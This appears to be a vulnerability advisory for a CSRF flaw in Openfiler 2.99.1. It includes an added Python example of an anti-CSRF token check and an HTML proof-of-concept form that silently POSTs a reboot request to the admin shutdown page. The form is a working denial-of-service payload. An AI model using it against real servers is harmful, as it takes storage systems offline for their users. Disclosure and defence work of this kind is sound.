<!--
# Exploit Title: DoS via CSRF in openfiler
# Exploit author: Dolev Farhi @dolevff
# Date 07/05/2014
# Vendor homepage: http://www.openfiler.com
# Affected Software version: 2.99.1
# Alerted vendor: 7.5.14
# CVE: N/A
Software Description
=====================
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.
Vulnerability Description
=========================
It is possible to shut down or reboot a server running Openfiler, causing a denial of service, via CSRF, because the shutdown request carries no session token.
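The missing control, shown as an added example (not Openfiler's code and not part of the original advisory): a per-session anti-CSRF token checked before a state-changing POST is honoured. The handler function, the `csrf_token` field name and the session id are assumptions; the other form fields are the ones in this advisory's PoC form.

```python
# Added example: session-bound anti-CSRF token check for a shutdown/reboot POST.
# handle_shutdown_post(), "csrf_token" and the session id are hypothetical names.
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret, never sent to the client
ALLOWED_TYPES = {"reboot"}            # the only shutdowntype value shown on the page


def issue_token(session_id: str) -> str:
    """Token bound to one session; rendered as a hidden field in the genuine form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_id: str, form: dict) -> bool:
    """Constant-time comparison of the submitted token with the expected one."""
    supplied = str(form.get("csrf_token", ""))
    return hmac.compare_digest(issue_token(session_id).encode(), supplied.encode())


def handle_shutdown_post(session_id: str, form: dict) -> int:
    """Return the HTTP status for POST /admin/system_shutdown.html."""
    # A cross-site form rides on the victim's session cookie but cannot read
    # the token out of the genuine admin page, so it fails here.
    if not token_valid(session_id, form):
        return 403
    if form.get("shutdowntype") not in ALLOWED_TYPES:
        return 400
    # The real handler would schedule the action here.
    return 200


# Constructed sample input: the fields of the PoC form, with and without a token.
SESSION = "constructed-session-id"
FORGED = {"shutdowntype": "reboot", "delay": "0", "action": "Shutdown"}
LEGIT = dict(FORGED, csrf_token=issue_token(SESSION))

if __name__ == "__main__":
    print("cross-site form:", handle_shutdown_post(SESSION, FORGED))
    print("genuine form:   ", handle_shutdown_post(SESSION, LEGIT))
```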
Steps to reproduce / PoC:
=========================
-->
<html>
<div align="center">
<pre>
<h2><b>DoS </b></h2>
<body>
<form action="https://ip.add.re.ss:446/admin/system_shutdown.html" method="POST">
<input type="hidden" name="shutdowntype" value="reboot"/>
<input type="hidden" name="delay" value="0"/>
<input type="hidden" name="action" value="Shutdown"/>
<input type="submit" name="submit" value="Attack"/>
</form>
</body>
</div>
</html>